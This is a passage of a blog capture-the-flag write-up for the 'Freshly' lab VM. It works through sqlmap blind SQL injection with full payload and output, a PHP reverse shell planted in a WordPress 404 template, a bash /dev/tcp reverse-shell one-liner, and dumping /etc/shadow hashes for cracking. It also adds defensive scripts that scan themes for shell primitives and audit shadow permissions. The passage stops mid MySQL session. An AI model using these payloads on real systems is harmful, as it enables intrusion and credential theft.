<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0IWJrdQetnH9G68khBVVfyLjlZwk72BVWS0NIhdA1cEQ8yepBkki4mFhFJp4ltJ6Pgo6LBPfvPm4RZkCcVQmLIFcBwWHnplBRrlApPJIjSqypEukTTwK4gjdQiVn6uyT_Hr2gAtc_JVQu/s1600/Screenshot+from+2015-05-27+13%253A48%253A45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0IWJrdQetnH9G68khBVVfyLjlZwk72BVWS0NIhdA1cEQ8yepBkki4mFhFJp4ltJ6Pgo6LBPfvPm4RZkCcVQmLIFcBwWHnplBRrlApPJIjSqypEukTTwK4gjdQiVn6uyT_Hr2gAtc_JVQu/s400/Screenshot+from+2015-05-27+13%253A48%253A45.png" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
A series of single quotes revealed that there was an underlying MySQL database on the server. Sounds like a job for sqlmap:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
root@kali:~# sqlmap -u "10.1.1.11/login.php" --data="user=1&password=1&s=Submit" --dbs <br />
_<br />
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150527}<br />
|_ -| . | | | .'| . |<br />
|___|_ |_|_|_|_|__,| _|<br />
|_| |_| http://sqlmap.org<br />
<br />
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program<br />
<br />
[*] starting at 23:53:02<br />
<br />
[23:53:02] [INFO] resuming back-end DBMS 'mysql' <br />
[23:53:02] [INFO] testing connection to the target URL<br />
[23:53:02] [INFO] heuristics detected web page charset 'ascii'<br />
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />
---<br />
Parameter: user (POST)<br />
Type: AND/OR time-based blind<br />
Title: MySQL > 5.0.11 AND time-based blind (SELECT)<br />
Payload: user=1' AND (SELECT * FROM (SELECT(SLEEP(5)))pxgC) AND 'YfWH'='YfWH&password=1&s=Submit<br />
---<br />
[23:53:03] [INFO] the back-end DBMS is MySQL<br />
web server operating system: Linux Ubuntu<br />
web application technology: Apache 2.4.7, PHP 5.5.9<br />
back-end DBMS: MySQL 5.0.11<br />
[23:53:03] [INFO] fetching database names<br />
[23:53:03] [INFO] fetching number of databases<br />
[23:53:03] [WARNING] time-based comparison requires larger statistical model, please wait.............................. <br />
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] <br />
[23:53:14] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors <br />
7<br />
[23:53:19] [INFO] retrieved: <br />
[23:53:24] [INFO] adjusting time delay to 1 second due to good response times<br />
information_schema<br />
[23:54:35] [INFO] retrieved: login<br />
[23:54:58] [INFO] retrieved: mysql<br />
[23:55:18] [INFO] retrieved: performance_schema<br />
[23:56:29] [INFO] retrieved: phpmyadmin<br />
[23:57:13] [INFO] retrieved: users<br />
[23:57:32] [INFO] retrieved: wordpress8080<br />
<b>
available databases [7]:<br />
[*] information_schema<br />
[*] login<br />
[*] mysql<br />
[*] performance_schema<br />
[*] phpmyadmin<br />
[*] users<br />
[*] wordpress8080</b><br />
<br />
[23:58:32] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.11'<br />
<br />
[*] shutting down at 23:58:32<br />
<br />
root@kali:~#</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
_______________________________________________________________________________</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Poking around in each DB with sqlmap I ultimately found the wordpress admin account:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
root@kali:~# sqlmap -u "10.1.1.11/login.php" --data="user=1&password=1&s=Submit" -D wordpress8080 --dump<br />
_<br />
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150527}<br />
|_ -| . | | | .'| . |<br />
|___|_ |_|_|_|_|__,| _|<br />
|_| |_| http://sqlmap.org<br />
<br />
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program<br />
<br />
[*] starting at 23:46:07<br />
<br />
[23:46:07] [WARNING] using '/root/.sqlmap/output' as the output directory<br />
[23:46:07] [INFO] testing connection to the target URL<br />
[23:46:07] [INFO] heuristics detected web page charset 'ascii'<br />
[23:46:07] [INFO] testing if the target URL is stable. This can take a couple of seconds<br />
[23:46:08] [INFO] target URL is stable<br />
[23:46:08] [INFO] testing if POST parameter 'user' is dynamic<br />
[23:46:08] [WARNING] POST parameter 'user' does not appear dynamic<br />
[23:46:08] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable<br />
[23:46:08] [INFO] testing for SQL injection on POST parameter 'user'<br />
[23:46:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'<br />
[23:46:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'<br />
[23:46:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'<br />
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'<br />
[23:46:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'<br />
[23:46:09] [INFO] testing 'MySQL inline queries'<br />
[23:46:09] [INFO] testing 'PostgreSQL inline queries'<br />
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'<br />
[23:46:09] [INFO] testing 'Oracle inline queries'<br />
[23:46:09] [INFO] testing 'SQLite inline queries'<br />
[23:46:09] [INFO] testing 'MySQL > 5.0.11 stacked queries'<br />
[23:46:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries'<br />
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'<br />
[23:46:09] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'<br />
[23:46:19] [INFO] POST parameter 'user' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable <br />
[23:46:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'<br />
[23:46:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found<br />
[23:46:20] [INFO] target URL appears to be UNION injectable with 2 columns<br />
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] <br />
[23:46:23] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') <br />
[23:46:23] [INFO] testing 'Generic UNION query (88) - 1 to 20 columns'<br />
[23:46:23] [INFO] checking if the injection point on POST parameter 'user' is a false positive<br />
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] <br />
sqlmap identified the following injection points with a total of 133 HTTP(s) requests:<br />
---<br />
Parameter: user (POST)<br />
Type: AND/OR time-based blind<br />
Title: MySQL > 5.0.11 AND time-based blind (SELECT)<br />
Payload: user=1' AND (SELECT * FROM (SELECT(SLEEP(5)))pxgC) AND 'YfWH'='YfWH&password=1&s=Submit<br />
---<br />
[23:46:45] [INFO] the back-end DBMS is MySQL<br />
web server operating system: Linux Ubuntu<br />
web application technology: Apache 2.4.7, PHP 5.5.9<br />
back-end DBMS: MySQL 5.0.11<br />
[23:46:45] [INFO] fetching tables for database: 'wordpress8080'<br />
[23:46:45] [INFO] fetching number of tables for database 'wordpress8080'<br />
[23:46:45] [INFO] retrieved: <br />
[23:46:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors <br />
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] <br />
1<br />
[23:46:54] [INFO] retrieved: <br />
[23:47:04] [INFO] adjusting time delay to 1 second due to good response times<br />
users<br />
[23:47:21] [INFO] fetching columns for table 'users' in database 'wordpress8080'<br />
[23:47:21] [INFO] retrieved: 2<br />
[23:47:23] [INFO] retrieved: username<br />
[23:47:53] [INFO] retrieved: password<br />
[23:48:28] [INFO] fetching entries for table 'users' in database 'wordpress8080'<br />
[23:48:28] [INFO] fetching number of entries for table 'users' in database 'wordpress8080'<br />
[23:48:28] [INFO] retrieved: 1<br />
[23:48:29] [INFO] retrieved: SuperSecretPassword<br />
[23:49:44] [INFO] retrieved: admin<br />
[23:50:03] [INFO] analyzing table dump for possible password hashes<br />
<b>
Database: wordpress8080<br />
Table: users<br />
[1 entry]<br />
+----------+---------------------+<br />
| username | password |<br />
+----------+---------------------+<br />
| admin | SuperSecretPassword |<br />
+----------+---------------------+</b><br />
<br />
[23:50:03] [INFO] table 'wordpress8080.users' dumped to CSV file '/root/.sqlmap/output/10.1.1.11/dump/wordpress8080/users.csv'<br />
[23:50:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.11'<br />
<br />
[*] shutting down at 23:50:03<br />
<br />
root@kali:~#</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
________________________________________________________________________________</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Let's use the newfound credentials:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYS_Jc_3Aux8zmR7a83p0ySJj-BSULy0Giv7NfBreLRyp8huiWbDR-IQZ0tVrpxfg8OFIiPA8v0gJrspNc70muhiEbyEE7DSGLNDm8Scy_N1J0m962lLFcK9JxANNc707lky1vGc4T_LQa/s1600/Screenshot+from+2015-05-27+00%253A04%253A17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYS_Jc_3Aux8zmR7a83p0ySJj-BSULy0Giv7NfBreLRyp8huiWbDR-IQZ0tVrpxfg8OFIiPA8v0gJrspNc70muhiEbyEE7DSGLNDm8Scy_N1J0m962lLFcK9JxANNc707lky1vGc4T_LQa/s320/Screenshot+from+2015-05-27+00%253A04%253A17.png" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Bingo:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis7nLzoiBu7Ec0r4EONzPKai5Cqz0vzbQiOIO7s6snUfT9QDPfr1ooqK3ZisePhVoOOwioHBhOBUfxFeMOcnUARRQl9b5sdR2h6mGHlVbKiyXKjF1d7RaGMkmSb_ZyiCUwy3E3gspAmzHI/s1600/Screenshot+from+2015-05-27+00%253A05%253A36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis7nLzoiBu7Ec0r4EONzPKai5Cqz0vzbQiOIO7s6snUfT9QDPfr1ooqK3ZisePhVoOOwioHBhOBUfxFeMOcnUARRQl9b5sdR2h6mGHlVbKiyXKjF1d7RaGMkmSb_ZyiCUwy3E3gspAmzHI/s400/Screenshot+from+2015-05-27+00%253A05%253A36.png" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Now, I have used multiple ways to get a shell from WordPress, often by uploading a plugin that relaxes the allowed upload file types when .php is blocked, and yes, that was the case here as well. (The Cart66 SQL injection may also work now that I have credentials.) However, a good friend pointed out the obvious: "Why go through the trouble of uploading a plugin, potentially leaving tracks, when you can just edit an existing page within WordPress with your own PHP code?" I had no logical answer. So I did it, and it was much easier. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
For those of you familiar with Kali, there are webshells for most of your needs in the following directory:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>/usr/share/webshells/php</b></div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHRxkk0GiBejsYEZpkyxW9jdpRJqbpiVAUe3fBmFfYh2Ge_4d9FVUMdi5DpbHBn1n2NvP_JmmDvP7J6SLr4gzEPBZyUZmzx7FT7wMIfIDBMITBqgqzd-awJOObdJZNNOvXuPzfEkuiausK/s1600/webshells.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHRxkk0GiBejsYEZpkyxW9jdpRJqbpiVAUe3fBmFfYh2Ge_4d9FVUMdi5DpbHBn1n2NvP_JmmDvP7J6SLr4gzEPBZyUZmzx7FT7wMIfIDBMITBqgqzd-awJOObdJZNNOvXuPzfEkuiausK/s400/webshells.png" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Penetration</h3>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The php-reverse-shell.php there is identical to the one hosted by <a href="http://pentestmonkey.net/tools/web-shells/php-reverse-shell" target="_blank">pentestmonkey</a>. I simply pasted the contents of the file into the theme's 404.php template using the built-in WordPress theme editor. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
There is one aspect of the shell which needs to be modified to match your attacking machine address:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>$ip = '10.1.1.5'; // CHANGE THIS<br />
$port = 1234; // CHANGE THIS</b></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
After starting a netcat listener on port 1234 and browsing to the now-malicious 404.php page (any URL that doesn't exist on the WordPress site will render it), the reverse shell connects back:<br />
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxH692-wcGnKfs4H_pZRow6BKZra3msjClJ84y4AZGp1JFX1EupJiVbJ6ELEUD_JAB5AZutkOl9XzMOfPc2myJOqU0iLYxe7FagWl1OBsehPS5Ruq2qv9hFTvqtYGoYiY-KLjW2UIqPyis/s1600/Screenshot+from+2015-05-27+00%253A15%253A45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxH692-wcGnKfs4H_pZRow6BKZra3msjClJ84y4AZGp1JFX1EupJiVbJ6ELEUD_JAB5AZutkOl9XzMOfPc2myJOqU0iLYxe7FagWl1OBsehPS5Ruq2qv9hFTvqtYGoYiY-KLjW2UIqPyis/s400/Screenshot+from+2015-05-27+00%253A15%253A45.png" width="400" /></a></div>
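<div style="text-align: left;">
A caveat on my friend's "no tracks" argument: the payload now lives in a theme file under wp-content/themes/, which is exactly where a defender (or a tester cleaning up after an engagement) should look. The following is an added example, not code from the write-up or from WordPress: it scans a theme directory for the network and process primitives a PHP reverse shell needs and scores each file. The directory layout and sample files are constructed for the demo, with the "planted" 404.php shaped like the pentestmonkey shell (fsockopen plus proc_open of /bin/sh); the indicator list is a starting point, not an exhaustive signature set.</div>

```python
"""Hunting for PHP payloads planted through the WordPress theme editor.

Added example, not code from the write-up. The 404.php trick leaves the
payload inside wp-content/themes/<theme>/, so it can be found by scanning
theme files for the primitives a reverse shell needs. The theme files
below are constructed for the demo; the indicator list is a starting
point, not an exhaustive signature set.
"""
import os
import re
import tempfile

# Functions a theme template has no business calling, split into two classes
# so a file that both opens a socket and spawns a process scores highest.
NETWORK_PRIMITIVES = ("fsockopen", "stream_socket_client", "socket_create", "curl_exec")
EXEC_PRIMITIVES = ("shell_exec", "proc_open", "passthru", "popen", "system",
                   "exec", "eval", "assert")

# Bare function name at a word boundary, followed by "(". The boundary keeps
# "exec(" from matching inside "shell_exec(" twice or inside "exec_summary(".
_PATTERN = re.compile(r"\b(" + "|".join(NETWORK_PRIMITIVES + EXEC_PRIMITIVES) + r")\s*\(",
                      re.IGNORECASE)


def scan_php_source(src):
    """Return the set of suspicious functions called in one PHP source string."""
    return {m.group(1).lower() for m in _PATTERN.finditer(src)}


def score(hits):
    """0 = clean, 1 = one class of primitive, 2 = network and exec together (shell-like)."""
    net = any(h in NETWORK_PRIMITIVES for h in hits)
    ex = any(h in EXEC_PRIMITIVES for h in hits)
    return int(net) + int(ex)


def scan_theme_dir(root):
    """Walk a theme directory; return {relative path: (score, sorted hits)} for files with hits."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read())
            if hits:
                findings[os.path.relpath(path, root)] = (score(hits), sorted(hits))
    return findings


# Constructed stand-ins for theme files. 404.php mirrors the shape of the
# pentestmonkey shell (connect back, spawn /bin/sh); the others are benign.
CONSTRUCTED_FILES = {
    "404.php": ("<?php\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\n"
                "$process = proc_open('/bin/sh -i', $descriptorspec, $pipes);\n?>"),
    "header.php": "<?php wp_head(); ?>\n<header><?php bloginfo('name'); ?></header>",
    "functions.php": "<?php\nadd_action('init', function () { return exec_summary(); });\n?>",
}


def demo():
    """Write the constructed theme to a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in CONSTRUCTED_FILES.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_theme_dir(root)


if __name__ == "__main__":
    for path, (sc, hits) in sorted(demo().items()):
        print("%d %s: %s" % (sc, path, ", ".join(hits)))
```

<div style="text-align: left;">
Content is only half of it: editing a template also bumps that file's modification time, so a plain find -newer against an untouched file in the same theme turns up the edited template even when the code is obfuscated past what a function-name scan catches. Pair both checks, and compare the theme against a clean copy of the same version where one is available.</div>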
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Now that we have a limited shell, we'll want to upgrade it to a proper interactive TTY. Whenever possible, I use the following Python one-liner:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>python -c 'import pty; pty.spawn("/bin/bash")'</b></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Here are a couple of other useful one-liners, since Python won't always be at your disposal (the first is a bash reverse shell back to a listener on 192.168.22.10:443, the second simply requests an interactive sh):</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
bash -i >& /dev/tcp/192.168.22.10/443 0>&1</div>
<div style="text-align: left;">
/bin/sh -i</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
and... generating an SSH key pair and appending the public key to ~/.ssh/authorized_keys on the victim; more to come on this in a separate write-up.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Once I had a decent shell, things moved pretty quickly, because /etc/shadow was readable by my unprivileged daemon user:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
$ python -c 'import pty; pty.spawn("/bin/bash")'</div>
<div style="text-align: left;">
daemon@Freshly:/$ <br />
<br />
daemon@Freshly:/$ id<br />
id<br />
uid=1(daemon) gid=1(daemon) groups=1(daemon)<br />
daemon@Freshly:/$ <br />
<br />
daemon@Freshly:/$ uname -a<br />
uname -a<br />
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux<br />
daemon@Freshly:/$ cat /etc/passwd<br />
cat /etc/passwd<br />
root:x:0:0:root:/root:/bin/bash<br />
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br />
bin:x:2:2:bin:/bin:/usr/sbin/nologin<br />
sys:x:3:3:sys:/dev:/usr/sbin/nologin<br />
sync:x:4:65534:sync:/bin:/bin/sync<br />
games:x:5:60:games:/usr/games:/usr/sbin/nologin<br />
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin<br />
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin<br />
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin<br />
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin<br />
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin<br />
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin<br />
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br />
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin<br />
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin<br />
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin<br />
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin<br />
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin<br />
libuuid:x:100:101::/var/lib/libuuid:<br />
syslog:x:101:104::/home/syslog:/bin/false<br />
messagebus:x:102:105::/var/run/dbus:/bin/false<br />
user:x:1000:1000:user,,,:/home/user:/bin/bash<br />
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false<br />
candycane:x:1001:1001::/home/candycane:<br />
# YOU STOLE MY SECRET FILE!<br />
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"<br />
daemon@Freshly:/$ cat /etc/shadow<br />
cat /etc/shadow<br />
root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::<br />
daemon:*:16483:0:99999:7:::<br />
bin:*:16483:0:99999:7:::<br />
sys:*:16483:0:99999:7:::<br />
sync:*:16483:0:99999:7:::<br />
games:*:16483:0:99999:7:::<br />
man:*:16483:0:99999:7:::<br />
lp:*:16483:0:99999:7:::<br />
mail:*:16483:0:99999:7:::<br />
news:*:16483:0:99999:7:::<br />
uucp:*:16483:0:99999:7:::<br />
proxy:*:16483:0:99999:7:::<br />
www-data:*:16483:0:99999:7:::<br />
backup:*:16483:0:99999:7:::<br />
list:*:16483:0:99999:7:::<br />
irc:*:16483:0:99999:7:::<br />
gnats:*:16483:0:99999:7:::<br />
nobody:*:16483:0:99999:7:::<br />
libuuid:!:16483:0:99999:7:::<br />
syslog:*:16483:0:99999:7:::<br />
messagebus:*:16483:0:99999:7:::<br />
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::<br />
mysql:!:16483:0:99999:7:::<br />
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::<br />
# YOU STOLE MY PASSWORD FILE!<br />
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"<br />
daemon@Freshly:/$ </div>
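<div style="text-align: left;">
That cat should have failed. On a stock Ubuntu 14.04 install /etc/shadow is mode 0640 and owned by root:shadow, so uid 1 gets permission denied; the VM author loosened it on purpose. Here is an added example, not code from the write-up, of the check a tester (or an auditor) runs to triage exactly this: is the file world-readable, and which of its entries carry a crackable hash versus a locked account. The sample lines are copied from the dump above, including the VM author's comment lines, to show the parser skips them.</div>

```python
"""Why `cat /etc/shadow` as uid 1 worked: a permissions and hash audit.

Added example, not code from the write-up. A stock Ubuntu 14.04 /etc/shadow
is 0640 root:shadow; the challenge VM loosened that. This checks the mode and
parses the file the way a tester triages it: which accounts are locked, which
carry crackable hashes, and with which algorithm. The sample is taken from the
dump in the post (hashes shortened nowhere; comment lines are the VM author's).
"""
import os
import stat
import tempfile

# crypt(3) id prefixes -> algorithm. "$6$" is what the dump above shows.
CRYPT_IDS = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
             "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}


def classify_hash(field):
    """Map the password field of a shadow entry to a status string."""
    if field == "*" or field.startswith("!"):
        return "locked"            # "*" never valid; "!" or "!<hash>" is an explicit lock
    if field == "":
        return "empty"             # login with no password at all
    for prefix, name in CRYPT_IDS.items():
        if field.startswith(prefix):
            return name
    return "unknown"               # legacy DES or something that is not a crypt string


def parse_shadow(text):
    """Yield (user, status, hash_field) per entry; skip blank lines and '#' comments."""
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        yield fields[0], classify_hash(fields[1]), fields[1]


def world_readable(path):
    """True if the 'other' read bit is set, which is the misconfiguration here."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def audit_shadow(path):
    """Return the file's exposure and which users are worth handing to John."""
    with open(path, encoding="utf-8") as fh:
        entries = list(parse_shadow(fh.read()))
    crackable = [u for u, status, _ in entries if status not in ("locked", "unknown", "empty")]
    empty = [u for u, status, _ in entries if status == "empty"]
    return {"world_readable": world_readable(path), "entries": len(entries),
            "crackable": crackable, "empty_password": empty}


# Sample lines copied from the /etc/shadow dump in the write-up.
SAMPLE_SHADOW = """\
root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
daemon:*:16483:0:99999:7:::
libuuid:!:16483:0:99999:7:::
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
mysql:!:16483:0:99999:7:::
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::
# YOU STOLE MY PASSWORD FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
"""


def demo(mode=0o644):
    """Write the sample to a temp file with the given mode (0644 = the VM's mistake) and audit it."""
    fd, path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_SHADOW)
        os.chmod(path, mode)
        return audit_shadow(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print("as on the VM:   ", demo(0o644))
    print("as Ubuntu ships:", demo(0o640))
```

<div style="text-align: left;">
Three of the six entries are sha512crypt hashes and therefore fair game for John; the rest are locked and not worth a second of cracking time. Run against the real file, the same routine is a quick post-exploitation triage step, and in a hardening review the world_readable flag is the finding.</div>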
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
___________________________________________________________________</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
This was probably enough to satisfy the requirements of the Challenge, but I continued. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I ran John against the password hashes using my favorite wordlist:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnoxudIKEcaCJtTK8qrALD6DvrRiyFoo86suPV0P4s1HBpab0k1Dkc4qK4GZmD9Ont6GEDMgWVxQNnE-tvpHoal8XZMzX55uUHxicCGE7lFXA4FgTsbr_wO7gz2vSi98sYuZF4JVgEgGB0/s1600/Screenshot+from+2015-05-27+00%253A28%253A16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="52" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnoxudIKEcaCJtTK8qrALD6DvrRiyFoo86suPV0P4s1HBpab0k1Dkc4qK4GZmD9Ont6GEDMgWVxQNnE-tvpHoal8XZMzX55uUHxicCGE7lFXA4FgTsbr_wO7gz2vSi98sYuZF4JVgEgGB0/s400/Screenshot+from+2015-05-27+00%253A28%253A16.png" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I probably didn't have to, but I logged in as the cracked user "candycane".</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Running an enumeration script, I found that login.php had the database credentials hard-coded in it:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>candycane@Freshly:/var/www/html$ cat login.php<br />
cat login.php<br />
mysql_connect('localhost','root','SuperSecretPassword');<br />
mysql_select_db('login');<br />
?></b></div>
<b><br /></b>
Same password as WordPress; nobody does that, yeah right...<br />
<br />
So I logged in as the DB root user with these credentials and enumerated a bit more:<br />
<br />
<br />
candycane@Freshly:/var/www/html$ mysql --user=root --password=SuperSecretPassword wordpress8080<br />
Reading table information for completion of table and column names<br />
You can turn off this feature to get a quicker startup with -A<br />
<br />
Welcome to the MySQL monitor. Commands end with ; or \g.<br />
Your MySQL connection id is 4886<br />
Server version: 5.5.41-0ubuntu0.14.04.1 (Ubuntu)<br />
<br />
Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.<br />
<br />
Oracle is a registered trademark of Oracle Corporation and/or its<br />
affiliates. Other names may be trademarks of their respective<br />
owners.<br />
<br />
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.<br />
<br />
mysql> <br />
<br />
<br />
mysql> show databases;<br />
+--------------------+<br />
| Database |<br />
+--------------------+<br />
| information_schema |<br />
| login |<br />
| mysql |<br />
| performance_schema |<br />
| phpmyadmin |<br />
| users |<br />
| wordpress8080 |<br />
+--------------------+<br />
7 rows in set (0.00 sec)<br />
<br />
mysql> show tables from login;<br />
